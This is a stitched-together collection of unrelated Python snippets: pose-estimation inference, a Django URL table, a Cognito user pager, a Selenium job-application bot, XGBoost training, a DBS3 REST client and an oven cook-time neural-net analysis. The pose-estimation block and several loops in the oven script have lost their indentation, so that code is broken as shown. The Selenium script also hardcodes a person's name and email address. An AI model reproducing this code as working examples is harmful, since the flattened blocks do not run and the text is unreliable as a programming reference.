offset = 0
num_keypoints = Pose.num_kpts
if not isinstance(img, Image):
img = Image(img)
# Bring image into the appropriate format for the implementation
img = img.convert(format='channels_last', channel_order='bgr')
h, w, _ = img.shape
max_width = w
xmin, ymin = 0, 0
ymax, xmax, _ = img.shape
if self.counter % 5 == 0:
kernel = int(h / self.first_pass_height)
if kernel > 0:
pool_img = self.__pooling(img, kernel)
else:
pool_img = img
# # ------- Heatmap Generation -------
avg_pafs = self.__first_pass(pool_img)
avg_pafs = avg_pafs.astype(np.float32)
pafs_map = cv2.blur(avg_pafs, (5, 5))
pafs_map[pafs_map < self.threshold] = 0
heatmap = pafs_map.sum(axis=2)
heatmap = heatmap * 100
heatmap = heatmap.astype(np.uint8)
heatmap = cv2.blur(heatmap, (5, 5))
self.prev_heatmap = heatmap
contours, hierarchy = cv2.findContours(heatmap, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
count = []
if len(contours) > 0:
for x in contours:
count.append(x)
xdim = []
ydim = []
for j in range(len(count)): # Loop for every human (every contour)
for i in range(len(count[j])):
xdim.append(count[j][i][0][0])
ydim.append(count[j][i][0][1])
h, w, _ = pool_img.shape
xmin = int(np.floor(min(xdim))) * int((w / heatmap.shape[1])) * kernel
xmax = int(np.floor(max(xdim))) * int((w / heatmap.shape[1])) * kernel
ymin = int(np.floor(min(ydim))) * int((h / heatmap.shape[0])) * kernel
ymax = int(np.floor(max(ydim))) * int((h / heatmap.shape[0])) * kernel
if self.xmin is None:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
else:
a = 0.2
self.xmin = a * xmin + (1 - a) * self.xmin
self.ymin = a * ymin + (1 - a) * self.ymin
self.ymax = a * ymax + (1 - a) * self.ymax
self.xmax = a * xmax + (1 - a) * self.xmax
extra_pad_x = int(self.perc * (self.xmax - self.xmin)) # Adding an extra pad around cropped image
extra_pad_y = int(self.perc * (self.ymax - self.ymin))
if self.xmin - extra_pad_x > 0:
xmin = self.xmin - extra_pad_x
else:
xmin = self.xmin
if self.xmax + extra_pad_x < img.shape[1]:
xmax = self.xmax + extra_pad_x
else:
xmax = self.xmax
if self.ymin - extra_pad_y > 0:
ymin = self.ymin - extra_pad_y
else:
ymin = self.ymin
if self.ymax + extra_pad_y < img.shape[0]:
ymax = self.ymax + extra_pad_y
else:
ymax = self.ymax
if (xmax - xmin) > 40 and (ymax - ymin) > 40:
crop_img = img[int(ymin):int(ymax), int(xmin):int(xmax)]
else:
crop_img = img[offset:img.shape[0], offset:img.shape[1]]
h, w, _ = crop_img.shape
if crop_img.shape[0] < self.second_pass_height:
second_pass_height = crop_img.shape[0]
else:
second_pass_height = self.second_pass_height
# ------- Second pass of the image, inference for pose estimation -------
avg_heatmaps, avg_pafs, scale, pad = self.__second_pass(crop_img, second_pass_height,
max_width, self.stride, upsample_ratio)
total_keypoints_num = 0
all_keypoints_by_type = []
for kpt_idx in range(18):
total_keypoints_num += extract_keypoints(avg_heatmaps[:, :, kpt_idx], all_keypoints_by_type,
total_keypoints_num)
pose_entries, all_keypoints = group_keypoints(all_keypoints_by_type, avg_pafs)
for kpt_id in range(all_keypoints.shape[0]):
all_keypoints[kpt_id, 0] = (all_keypoints[kpt_id, 0] * self.stride / upsample_ratio - pad[
1]) / scale
all_keypoints[kpt_id, 1] = (all_keypoints[kpt_id, 1] * self.stride / upsample_ratio - pad[
0]) / scale
for i in range(all_keypoints.shape[0]):
for j in range(all_keypoints.shape[1]):
if j == 0: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + xmin) - offset)
if j == 1: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + ymin) - offset)
current_poses = []
for n in range(len(pose_entries)):
if len(pose_entries[n]) == 0:
continue
pose_keypoints = np.ones((num_keypoints, 2), dtype=np.int32) * -1
for kpt_id in range(num_keypoints):
if pose_entries[n][kpt_id] != -1.0: # keypoint was found
pose_keypoints[kpt_id, 0] = int(all_keypoints[int(pose_entries[n][kpt_id]), 0])
pose_keypoints[kpt_id, 1] = int(all_keypoints[int(pose_entries[n][kpt_id]), 1])
if np.count_nonzero(pose_keypoints == -1) < 26:
pose = Pose(pose_keypoints, pose_entries[n][18])
current_poses.append(pose)
else:
if self.xmin is None:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
else:
a = 0.2
self.xmin = a * xmin + (1 - a) * self.xmin
self.ymin = a * ymin + (1 - a) * self.ymin
self.ymax = a * ymax + (1 - a) * self.ymax
self.xmax = a * xmax + (1 - a) * self.xmax
else:
extra_pad_x = int(self.perc * (self.xmax - self.xmin)) # Adding an extra pad around cropped image
extra_pad_y = int(self.perc * (self.ymax - self.ymin))
if self.xmin - extra_pad_x > 0:
xmin = self.xmin - extra_pad_x
else:
xmin = self.xmin
if self.xmax + extra_pad_x < img.shape[1]:
xmax = self.xmax + extra_pad_x
else:
xmax = self.xmax
if self.ymin - extra_pad_y > 0:
ymin = self.ymin - extra_pad_y
else:
ymin = self.ymin
if self.ymax + extra_pad_y < img.shape[0]:
ymax = self.ymax + extra_pad_y
else:
ymax = self.ymax
if (xmax - xmin) > 40 and (ymax - ymin) > 40:
crop_img = img[int(ymin):int(ymax), int(xmin):int(xmax)]
else:
crop_img = img[offset:img.shape[0], offset:img.shape[1]]
h, w, _ = crop_img.shape
if crop_img.shape[0] < self.second_pass_height:
second_pass_height = crop_img.shape[0]
else:
second_pass_height = self.second_pass_height
# ------- Second pass of the image, inference for pose estimation -------
avg_heatmaps, avg_pafs, scale, pad = self.__second_pass(crop_img, second_pass_height,
max_width, self.stride, upsample_ratio)
total_keypoints_num = 0
all_keypoints_by_type = []
for kpt_idx in range(18):
total_keypoints_num += extract_keypoints(avg_heatmaps[:, :, kpt_idx], all_keypoints_by_type,
total_keypoints_num)
pose_entries, all_keypoints = group_keypoints(all_keypoints_by_type, avg_pafs)
for kpt_id in range(all_keypoints.shape[0]):
all_keypoints[kpt_id, 0] = (all_keypoints[kpt_id, 0] * self.stride / upsample_ratio - pad[1]) / scale
all_keypoints[kpt_id, 1] = (all_keypoints[kpt_id, 1] * self.stride / upsample_ratio - pad[0]) / scale
for i in range(all_keypoints.shape[0]):
for j in range(all_keypoints.shape[1]):
if j == 0: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + xmin) - offset)
if j == 1: # Adjust offset if needed for evaluation on our HR datasets
all_keypoints[i][j] = round((all_keypoints[i][j] + ymin) - offset)
current_poses = []
for n in range(len(pose_entries)):
if len(pose_entries[n]) == 0:
continue
pose_keypoints = np.ones((num_keypoints, 2), dtype=np.int32) * -1
for kpt_id in range(num_keypoints):
if pose_entries[n][kpt_id] != -1.0: # keypoint was found
pose_keypoints[kpt_id, 0] = int(all_keypoints[int(pose_entries[n][kpt_id]), 0])
pose_keypoints[kpt_id, 1] = int(all_keypoints[int(pose_entries[n][kpt_id]), 1])
if np.count_nonzero(pose_keypoints == -1) < 26:
pose = Pose(pose_keypoints, pose_entries[n][18])
current_poses.append(pose)
if np.any(self.prev_heatmap) is False:
heatmap = np.zeros((int(img.shape[0] / (int((img.shape[0] / self.first_pass_height))) / 8),
int(img.shape[1] / (int((img.shape[0] / self.first_pass_height))) / 8)),
dtype=np.uint8)
else:
heatmap = self.prev_heatmap
self.counter += 1
return current_poses, heatmap
    def download(self, path=None, mode="pretrained", verbose=False,
                 url=OPENDR_SERVER_URL + "perception/pose_estimation/lightweight_open_pose/",
                 image_resolution=1080):
        """
        Download utility for various Lightweight Open Pose components. Downloads files depending on mode and
        saves them in the path provided. It supports downloading:
        1) the default mobilenet pretrained model
        2) mobilenet, mobilenetv2 and shufflenet weights needed for training
        3) a test dataset with a single COCO image and its annotation

        :param path: Local path to save the files, defaults to self.temp_path if None
        :type path: str, path, optional
        :param mode: What file to download, can be one of "pretrained", "weights", "test_data", defaults to "pretrained"
        :type mode: str, optional
        :param verbose: Whether to print messages in the console, defaults to False
        :type verbose: bool, optional
        :param url: URL of the FTP server, defaults to OpenDR FTP URL
        :type url: str, optional
        :param image_resolution: Resolution of the test images to download
        :type image_resolution: int, optional
        """
        valid_modes = ["weights", "pretrained", "test_data"]
        if mode not in valid_modes:
            raise UserWarning("mode parameter not valid:", mode, ", file should be one of:", valid_modes)
        if path is None:
            path = self.temp_path
        if not os.path.exists(path):
            os.makedirs(path)
        if mode in ("pretrained", "weights"):
            # Model/weight downloads are identical to the parent learner's.
            super(HighResolutionPoseEstimationLearner, self).download(path=path, mode=mode, verbose=verbose, url=url)
        elif mode == "test_data":
            if verbose:
                print("Downloading test data...")
            if not os.path.exists(os.path.join(self.temp_path, "dataset")):
                os.makedirs(os.path.join(self.temp_path, "dataset"))
            if not os.path.exists(os.path.join(self.temp_path, "dataset", "image")):
                os.makedirs(os.path.join(self.temp_path, "dataset", "image"))
            # Path for high resolution data
            url = OPENDR_SERVER_URL + "perception/pose_estimation/high_resolution_pose_estimation/"
            # Download annotation file
            # NOTE(review): os.path.join on a URL produces backslashes on
            # Windows, breaking the URL — confirm and consider posixpath/"/".join.
            file_url = os.path.join(url, "dataset", "annotation.json")
            urlretrieve(file_url, os.path.join(self.temp_path, "dataset", "annotation.json"))
            # Download test image
            if image_resolution in (1080, 1440):
                file_url = os.path.join(url, "dataset", "image", "000000000785_" + str(image_resolution) + ".jpg")
                # NOTE(review): the file is always saved as *_1080.jpg even when
                # the 1440 image was requested — verify this is intentional.
                urlretrieve(file_url, os.path.join(self.temp_path, "dataset", "image", "000000000785_1080.jpg"))
            else:
                raise UserWarning("There are no data for this image resolution (only 1080 and 1440 are supported).")
            if verbose:
                print("Test data download complete.")
|
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
# URL table for the public "info" site pages; every route is handled by a
# view in info.views, referenced by a dotted string path.
# NOTE(review): patterns() and string view references were deprecated in
# Django 1.8 and removed in 1.10 -- this module targets an older Django.
urlpatterns = patterns('',
    (r'^$', 'info.views.index'),
    (r'^about/$', 'info.views.about'),
    (r'^instructions/$', 'info.views.instructions'),
    (r'^team/$', 'info.views.team'),
    (r'^usingmuni/$', 'info.views.new_to_muni'),
    (r'^signup/$', 'info.views.signup'),
    (r'^survey/$', 'info.views.survey'),
    (r'^contact/$', 'info.views.contact'),
    (r'^install_instructions/$', 'info.views.install'),
    (r'^participation_instructions/$', 'info.views.participation'),
    (r'^widget_instructions/$', 'info.views.widget'),
    # Examples:
    # url(r'^$', 'SF_Traveler.views.home', name='home'),
    # url(r'^SF_Traveler/', include('SF_Traveler.foo.urls')),
    # Uncomment the admin/doc line below to enable admin documentation:
    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # Uncomment the next line to enable the admin:
    # url(r'^admin/', include(admin.site.urls)),
)
|
def list_users(user_filter):
    """Return all Cognito users matching *user_filter*, following pagination.

    Repeatedly calls ``list_users`` while the response carries a
    ``PaginationToken`` and accumulates every page's ``Users`` entries.
    """
    base_kwargs = dict(UserPoolId=COGNITO_USER_POOL_ID, Filter=user_filter)
    response = cognito_client.list_users(**base_kwargs)
    matched = list(response['Users'])
    # A response without 'PaginationToken' marks the final page.
    while 'PaginationToken' in response:
        response = cognito_client.list_users(PaginationToken=response['PaginationToken'],
                                             **base_kwargs)
        matched.extend(response['Users'])
    return matched
|
from selenium import webdriver
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
'''
def get_web_driver(the_url):
browser = webdriver.Chrome('C:\chromedriver\chromedriver.exe')
browser.set_page_load_timeout("5")
browser.get(the_url)
return browser
'''
def answer_info(driver):
    """Click through screener-question pages until the submit button appears.

    On each page every element with class ``input`` is clicked, the
    "continue" button is pressed, and the next questions iframe is entered.
    Finally the submit button is clicked.

    :param driver: a selenium WebDriver already positioned on the first page
    """
    # BUG FIX: find_element_by_xpath raises NoSuchElementException when the
    # node is absent, so `while not driver.find_element_by_xpath(...)` could
    # never loop; find_elements returns an empty (falsy) list instead.
    while not driver.find_elements_by_xpath("//*[@id='form-action-submit']"):
        questions = driver.find_elements_by_class_name("input")
        for question in questions:  # answer the questions
            question.click()
        # continue to next page
        driver.find_element_by_xpath("//*[@id='form-action-continue']").click()
        WebDriverWait(driver, 10).until(
            EC.frame_to_be_available_and_switch_to_it(driver.find_element_by_xpath('//iframe')))
        i_frame = driver.find_element_by_tag_name("iframe")
        driver.switch_to.frame(i_frame)
    driver.find_element_by_xpath("//*[@id='form-action-submit']").click()
user_first_name = "Xinyao"
user_last_name = "Zhang"
user_Email = "zhangxinyao88@gmail.com"
resume_rep = "D:\Resume:\Sample.txt"  # NOTE(review): unused, and the path looks malformed -- confirm before relying on it
job_page = "https://www.indeed.com/viewjob?jk=1715bbb95511d8be&from=serp&vjs=3"
driver = webdriver.Chrome('C:\chromedriver\chromedriver.exe')
driver.set_page_load_timeout("5")
driver.get(job_page)
driver.find_element_by_xpath("//*[@id='indeedApplyButtonContainer']").click()  # find and click the apply button
# The application form lives inside an iframe: wait for it, then switch into it.
WebDriverWait(driver, 10).until(EC.frame_to_be_available_and_switch_to_it(driver.find_element_by_xpath('//iframe')))
i_frame = driver.find_element_by_tag_name("iframe")
driver.switch_to.frame(i_frame)  # pop-up window with name (or first/last name), email and resume
# Determine whether the form asks for first + last name or a single full name.
# BUG FIX: find_element_by_xpath raises NoSuchElementException when the node
# is missing, so the original `if first_name:` test could never reach its
# else branch; find_elements returns an empty (falsy) list instead.
if driver.find_elements_by_xpath("//*[@id='label-input-applicant.firstName']/label"):  # first + last name
    first_name_space = driver.find_element_by_xpath("//*[@id='input-applicant.firstName']")
    first_name_space.send_keys(user_first_name)
    if driver.find_elements_by_xpath("//*[@id='label-input-applicant.lastName']/label"):
        last_name_space = driver.find_element_by_xpath("//*[@id='input-applicant.lastName']")
        last_name_space.send_keys(user_last_name)
else:
    # BUG FIX: type into the full-name *input*, not its <label> element.
    name_space = driver.find_element_by_xpath("//*[@id='input-applicant.name']")  # full name
    name_space.send_keys(user_first_name + " " + user_last_name)
# Email
Email_space = driver.find_element_by_xpath("//*[@id='input-applicant.email']")
Email_space.send_keys(user_Email)
# Resume upload (the file input accepts a local path via send_keys)
resume_button = driver.find_element_by_xpath("//*[@id='ia-FilePicker-resume']")
resume_button.send_keys("C:/Users/zhang/Desktop/Sum.docx")
# Click continue button, then switch into the follow-up questions iframe
driver.find_element_by_xpath("//*[@id='form-action-continue']").click()
WebDriverWait(driver, 10).until(EC.frame_to_be_available_and_switch_to_it(driver.find_element_by_tag_name("iframe")))
i_frame2 = driver.find_element_by_tag_name("iframe")
driver.switch_to.frame(i_frame2)
questions = driver.find_elements_by_class_name("input")
for question in questions:  # answer the questions
    print(question.text)
    question.click()
driver.find_element_by_xpath("//*[@id='form-action-submit']").click()
# answer_info(driver)
# -*- coding:utf-8 -*-
import pandas as pd
import numpy as np
import xgboost as xgb
path = '/Users/chenhong/'
# Strings treated as missing values when parsing the feature file.
na_values = ['', 'NULL', 'null', 'NA', 'na', 'NaN', 'nan', '\\N']
## load data
feature_import='xgb_model/feature_importance_with_sort_feature_.txt'
train_pre_file='xgb_model/train_pred_with_sort_feature.txt'
valid_pre_file='xgb_model/valid_pred_with_sort_feature.txt'
model = 'xgb_model/card_with_sort_feature.model'
feature_file='/Users/chenhong/card_play_feature_add_sort_feature.csv'
feat_map_file = '/Users/chenhong/card_feat_map.txt'
xy_df = pd.read_table(feature_file, sep=',', na_values=na_values)
xy_df = xy_df.fillna(-999999)  # sentinel for missing values
## split train test oot dataset
print("finish reading training data")
# shuffle and split train_set to train and valid set: assign a random
# permutation as the index, then cut at the 70% mark
idx = np.arange(xy_df.shape[0])
np.random.shuffle(idx)
xy_df.index = idx
samp_rate = 0.7
n_rcd = xy_df.shape[0]
valid_set = xy_df[xy_df.index.values > n_rcd * samp_rate]
train_set = xy_df[xy_df.index.values <= n_rcd * samp_rate]
## convert to DMatrix
print("after shuffle the train and validate data")
cols_x = train_set.columns.values[1:]  # first column is the label
print(cols_x)
# BUG FIX: DataFrame.as_matrix() was deprecated in pandas 0.23 and removed
# in 1.0; .values is the drop-in equivalent on every pandas version.
train_data = train_set[cols_x].values
train_label = train_set['label'].values
dtrain = xgb.DMatrix(train_data, label = train_label)
valid_data = valid_set[cols_x].values
valid_label = valid_set['label'].values
dvalid = xgb.DMatrix(valid_data, label = valid_label)
## Train model
# XGBoost hyper-parameters for a binary classifier evaluated by AUC.
param = {'max_depth': 3,
         'learning_rate': 0.1,
         'min_child_weight': 2,
         'reg_alpha': 50,
         'reg_lambda': 50,
         'scale_pos_weight': 1,
         'subsample': 0.9,
         'colsample_bytree': 0.9,
         'silent': True,
         'objective': 'binary:logistic',
         'nthread': 10,
         'eval_metric': 'auc'}
evallist = [(dtrain, 'train'), (dvalid, 'valid')]
print("try to train the modeling")
bst = xgb.train(param,
                dtrain,
                num_boost_round = 400,
                evals = evallist)
# save model
bst.save_model(path + model)
# load model (round-trips the saved file through a fresh Booster)
bst = xgb.Booster()
bst.load_model(path + model)
# dump model with feature map: one "<id>\t<name>\tq" row per feature
feat_map_df = pd.DataFrame({'id': list(range(len(cols_x)))})
feat_map_df = feat_map_df.assign(feat_name = cols_x)
feat_map_df = feat_map_df.assign(type = ['q' for i in range(len(cols_x))])
feat_map_df.to_csv(feat_map_file, sep = '\t', header = False, index = False)
## predict
cols = ['label']
# BUG FIX: train_set[cols] is a slice of train_set; assigning a new column
# to it triggers SettingWithCopyWarning and may silently fail to stick.
# Take an explicit copy before adding the score column.
train_pred_df = train_set[cols].copy()
train_pred_df['score'] = bst.predict(dtrain)
train_pred_df.to_csv(path + train_pre_file, sep='\t', index=False)
valid_pred_df = valid_set[cols].copy()
valid_pred_df['score'] = bst.predict(dvalid)
valid_pred_df.to_csv(path + valid_pre_file, sep='\t', index=False)
## 计算AUC、KS
import sklearn.metrics as mtrs
# compute auc and ks
def compute_auc_ks(y_true, y_pred):
    """Return (AUC, KS) for binary labels *y_true* scored by *y_pred*.

    KS is the Kolmogorov-Smirnov statistic: the maximum gap between the
    true-positive and false-positive rates along the ROC curve.
    """
    fpr, tpr, _ = mtrs.roc_curve(y_true, y_pred)
    area_under_curve = mtrs.auc(fpr, tpr)
    ks_stat = max(tpr - fpr)
    return area_under_curve, ks_stat
# Report AUC/KS on both splits: [auc_train, auc_valid, ks_train, ks_valid]
train = train_pred_df
valid = valid_pred_df
auc_train, ks_train = compute_auc_ks(train.label, train.score)
auc_valid, ks_valid = compute_auc_ks(valid.label, valid.score)
print([round(auc_train,3), round(auc_valid,3), round(ks_train,3), round(ks_valid,3)])
|
#!/usr/bin/env python
# | Copyright 2015-2016 Karlsruhe Institute of Technology
# |
# | Licensed under the Apache License, Version 2.0 (the "License");
# | you may not use this file except in compliance with the License.
# | You may obtain a copy of the License at
# |
# | http://www.apache.org/licenses/LICENSE-2.0
# |
# | Unless required by applicable law or agreed to in writing, software
# | distributed under the License is distributed on an "AS IS" BASIS,
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# | See the License for the specific language governing permissions and
# | limitations under the License.
from grid_control.gc_exceptions import UserError
from grid_control.utils.webservice import GridJSONRestClient
class DBS3LiteClient(object):
	"""Minimal client for the DBS3 REST services (reader, writer, migration)."""
	def __init__(self, url):
		# Endpoint of each DBS3 service, derived from the common base URL
		(self._reader_url, self._writer_url, self._migrate_url) = [
			'%s/%s' % (url, service) for service in ('DBSReader', 'DBSWriter', 'DBSMigrate')]
		# Shared REST helper; a missing VOMS proxy is reported as a UserError
		self._gjrc = GridJSONRestClient(cert_error_msg = 'VOMS proxy needed to query DBS3!', cert_error_cls = UserError)
	def listBlocks(self, **kwargs):
		# GET <reader>/blocks
		return self._gjrc.get(url = self._reader_url, api = 'blocks', params = kwargs)
	def listFiles(self, **kwargs):
		# GET <reader>/files
		return self._gjrc.get(url = self._reader_url, api = 'files', params = kwargs)
	def listFileParents(self, **kwargs):
		# GET <reader>/fileparents
		return self._gjrc.get(url = self._reader_url, api = 'fileparents', params = kwargs)
	def insertBulkBlock(self, data):
		# POST <writer>/bulkblocks
		return self._gjrc.post(url = self._writer_url, api = 'bulkblocks', data = data)
	def migrateSubmit(self, data):
		# POST <migrate>/submit
		return self._gjrc.post(url = self._migrate_url, api = 'submit', data = data)
	def migrateStatus(self, **kwargs):
		# GET <migrate>/status
		return self._gjrc.get(url = self._migrate_url, api = 'status', params = kwargs)
|
import os
import pandas as pd
from sklearn.model_selection import train_test_split
from tensorflow import keras
import numpy as np
os.chdir("C:/Users/Kyeongjun/Desktop/LG가전데이터")
"""------------------------------------------------------------------------------------------------------
### 1. calculating expected cooktime of 27 menus
------------------------------------------------------------------------------------------------------"""
## 1-1. select the 27 menus & sort them in Korean alphabetical order
# Selection criteria: menus cooked 100+ times & cooked by 10+ users (devices)
oven = pd.read_csv('Oven_cooktimePred.csv', encoding='euc-kr')
menu = list(set(oven.Cook_menu)) # 27 menus
menu.sort()
## 1-2. compute the expected cooktime per menu (mean, mode, median)
name, mean, mode, median = [], [], [], []
for i in range(27):
    df = oven.loc[oven['Cook_menu'] == menu[i],['Cook_menu', 'Cookingtime']]
    # Frequency table of cooking times for this menu: columns [time, count]
    df1 = pd.DataFrame(df.Cookingtime.value_counts()).sort_index()
    df1 = pd.DataFrame(list(zip(list(df1.index),list(df1.Cookingtime))), columns= ['time', 'count'])
    # Count-weighted mean cooking time
    m1 = round(sum(df1.iloc[:,0]*df1.iloc[:,1])/sum(df1.iloc[:,1]), 2)
    # Mode: the time with the largest count
    m2 = df1.sort_values(by='count').iloc[len(df1)-1,0]
    k = sum(df1['count'])/2
    # NOTE(review): parity test on half the record count, used below to pick
    # the median formula -- looks like an even/odd check; verify the intent
    o = (k%2 == 0)
    df0 = df.sort_values(by='Cookingtime')
    df0 = df0.reset_index(drop=True)
    if o :
        m3 = (df0['Cookingtime'][round(k)] + df0['Cookingtime'][round(k)+1])/2
    else :
        m3 = df0['Cookingtime'][round(k)]
    name.append(menu[i]); mean.append(m1); mode.append(m2); median.append(m3)
ex_cooktime = pd.DataFrame(list(zip(name,mean,mode,median)), columns = ['menu','mean','mode','median'])
del m1, m2, m3, df, df1, df0, k, o, mean, mode, median, name, i
ex_cooktime.to_csv('ex_cooktime.csv', header=True, index=False, encoding = 'euc-kr')
"""------------------------------------------------------------------------------------------------------
### 2. NN (user charicteristics + menu)
------------------------------------------------------------------------------------------------------"""
## 2-1. cooktime prediction용 DF 생성
oven_c = pd.read_csv('oven_clustering.csv') # user charicteristics df
oven = pd.read_csv('Oven_sample.csv', encoding = 'euc-kr')
oven['Cookingtime'] = oven['Cook_hour']*60*60 + oven['Cook_min']*60 + oven['Cook_sec'] # Cookingtime변수 생성 (시,분,초를 합산)
oven = oven.loc[oven['EVENT'] == '요리시작',:] # 요리 시작에 관한 데이터만 추출
oven = oven.loc[oven['Cook_menu'].isin(menu),] # 27개 메뉴에 관한 데이터만 추출
oven = oven.iloc[:,[2,6,12]] # DVICE_ID, Cook_menu, Cookingtime 변수만 선택
ctPred1 = pd.merge(oven_c,oven, left_on = 'DEVICE_ID', right_on = 'DEVICE_ID', how = 'inner')
ctPred1.columns = list(ctPred1.columns[:23]) +['Y']
# NN에 입력하기 위해 string으로 표현된 Cook_menu를 각각 0~26의 숫자로 대체합니다.
for i in range(len(ctPred1)) :
k = ctPred1.iloc[i,22]
num = menu.index(k)
ctPred1.iloc[i,22] = num
del k, num, i
ctPred1 = ctPred1.iloc[:,1:]
ctPred1.to_csv('ctPred1.csv', header=True, index=False)
del oven
## 2-2. NeuralNetwork modeling
# train_test_split
train, test = train_test_split(ctPred1, test_size = 0.2)
## make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1))) # 종속변수 Y를 제외한 변수 개수를 input size로 설정
NN.add(keras.layers.Dense(11, activation = "relu")) # hidden layer의 node 개수는 input변수의 개수와 output 변수의 개수의 중간 값으로 설정
NN.add(keras.layers.Dense(1, activation = None)) # output변수. 연속형이므로 activation function을 설정하지 않습니다.
Adam = keras.optimizers.Adam(learning_rate = 0.001) # optimizer는 Adam, learning_rate는 0.001
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse']) # mse를 기준으로 모델을 평가/학습합니다.
# model fitting & evaluation
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 30, batch_size=10) # batch_size = 10으로 설정하여 한번에 10개 row씩 학습됩니다.
# epochs = 30으로 설정하여 train set을 30번 학습시킵니다.
NN.evaluate(test.iloc[:,:-1], test.iloc[:,-1]) # test set에서의 성능을 확인입니다.
(600000**(1/2))/60 # 대략 +-12분정도의 차이를 보임
"""------------------------------------------------------------------------------------------------------
### 3. NN (user charicteristics + menu + accumulate/recent session variables)
------------------------------------------------------------------------------------------------------"""
## 3-1. 추가 변수 DF 생성
# 생성 변수 종류
# 동작 이전 : 메뉴 요리 횟수, 레인지 평균 요리 시간, 오븐 평균 요리 시간,
# 이전 세션 : 메뉴 요리 여부, 요리 시간
# 기타 : 현지 시간(시), 월
# 동작 이전 누적 변수 생성
oven_av = pd.read_csv('Oven_sample.csv', encoding = 'euc-kr')
oven_av['Cookingtime'] = oven_av['Cook_hour']*60*60 + oven_av['Cook_min']*60 + oven_av['Cook_sec']
oven_av = oven_av.loc[oven_av['EVENT'] == '요리시작',]
oven_av['Micro_t'], oven_av['Oven_t'], oven_av['MenuFreq'] = 0,0,0
df = pd.DataFrame()
for i in list(set(oven_av.DEVICE_ID)) :
df0 = oven_av.loc[oven_av['DEVICE_ID'] == i,:]
df0 = df0.sort_values(by='LOCAL_TIME')
for j in range(df0.shape[0]) :
df1 = df0.copy(deep=True)
df1 = df1.iloc[:j+1,:]
k = df1.loc[df1['Cook_Mode'].isin(['레인지', '레인지 자동']),'Cookingtime']
if len(k) != 0 :
df0.iloc[j,13] = sum(k)/len(k)
k = df1.loc[df1['Cook_Mode'].isin(['오븐', '오븐 자동']),'Cookingtime']
if len(k) != 0 :
df0.iloc[j,14] = sum(k)/len(k)
k = df1.loc[df1['Cook_menu'] == df0.iloc[j,6],'Cookingtime']
df0.iloc[j,15] = len(k)
df = df.append(df0)
oven_av = df.copy(deep=True)
del i, j, df0, df1, k, df
oven_av = oven_av.loc[oven_av['Cook_menu'].isin(menu),] # 27개 메뉴 데이터 추출
# 이전 세션 변수 생성 (1hour rule)
session = pd.read_csv('session.csv', encoding='euc-kr')
session['S1'], session['S2'] = 0, 0
for i in range(session.shape[0])[1:] :
s = session.loc[session['Session2'] == session.iloc[i,11]-1,:]
session.iloc[i,14] = sum(s['Cook_hour'])*60*60 + sum(s['Cook_min'])*60 + sum(s['Cook_sec'])
session.iloc[i,13] = 1 if (session.iloc[i,5] in list(s.Cook_menu)) else 0
session = session.loc[session['Cook_menu'].isin(menu),:] # 27개 메뉴 데이터 추출
del s, i,
# 기타 변수까지 포함한 DataFrame 생성
oven_av = oven_av.sort_values(by=['DEVICE_ID','LOCAL_TIME']) # DEVICE_ID, LOCAL_TIME으로 정렬한 뒤,
df0 = oven_av.iloc[:,[1,2,6,12,13,14,15]] # 변수 선택
df0 = df0.reset_index(drop=True) # session 변수와 합칠 때 index별로 concatenate 되지 않도록 index reset
session = session.sort_values(by=['DEVICE_ID','LOCAL_TIME']) # session 데이터도 위와 동일한 작업을 합니다.
df1 = session.iloc[:,[1,13,14]]
df1 = df1.reset_index(drop=True)
df = pd.concat([df0,df1.iloc[:,[1,2]]],axis=1) # 동작이전 누적 변수와 이전세션 변수 통합
ctPred2 = pd.merge(oven_c,df, left_on = 'DEVICE_ID', right_on = 'DEVICE_ID', how = 'inner') # 위 통합 데이터와 DEVICE_ID별 특징변수 통합
ctPred2 = ctPred2.sort_values(by=['DEVICE_ID','LOCAL_TIME']) # DEVICE_ID, LOCAL_TIME으로 정렬
ctPred2.to_csv('ctPred2_preprocessing.csv', header=True, index=False, encoding='euc-kr')
del df0, df1, df
# NN에 입력하기 위해 string으로 표현된 Cook_menu를 각각 0~26의 숫자로 대체합니다.
for i in range(len(ctPred2)) :
k = ctPred2.iloc[i,23]
num = menu.index(k)
ctPred2.iloc[i,23] = num
del k, num, i
ctPred2['time'], ctPred2['month'] = 0, 0
for i in range(len(ctPred2)) :
ctPred2.iloc[i,30] = int(ctPred2.iloc[i,22][11:13]) # time 변수 생성
ctPred2.iloc[i,31] = int(ctPred2.iloc[i,22][5:7]) # month 변수 생성
del i, ctPred2['LOCAL_TIME'], ctPred2['DEVICE_ID']
# column 순서 변경 (Cookingtime = Y 를 끝으로)
cols = ctPred2.columns.tolist()
cols = cols[:cols.index('Cookingtime')] + cols[cols.index('Cookingtime')+1:]
cols.append('Cookingtime')
ctPred2 = ctPred2[cols]
cols = ctPred2.columns.tolist()
cols[len(cols)-1] = 'Y'
ctPred2.columns = cols
del cols
ctPred2.to_csv('ctPred2.csv', header=True, index=False)
## 3-2. NeuralNetwork modeling 2
# train_test_split
train, test = train_test_split(ctPred2, test_size = 0.2)
## 3-3. make NN model
NN = keras.Sequential()
NN.add(keras.layers.Input(shape = (train.shape[1]-1)))
NN.add(keras.layers.Dense(18, activation = "relu")) # hidden layer의 layer 개수는 2, node 개수는 input변수의 개수와 output 변수의 개수의 1/3, 1/3 지점으로 설정
NN.add(keras.layers.Dense(9, activation = "relu"))
NN.add(keras.layers.Dense(1, activation = None))
Adam = keras.optimizers.Adam(learning_rate = 0.001)
NN.compile(optimizer = Adam, loss = 'mse', metrics = ['mse'])
NN.fit(train.iloc[:,:-1],train.iloc[:,-1], epochs = 70, batch_size=1)
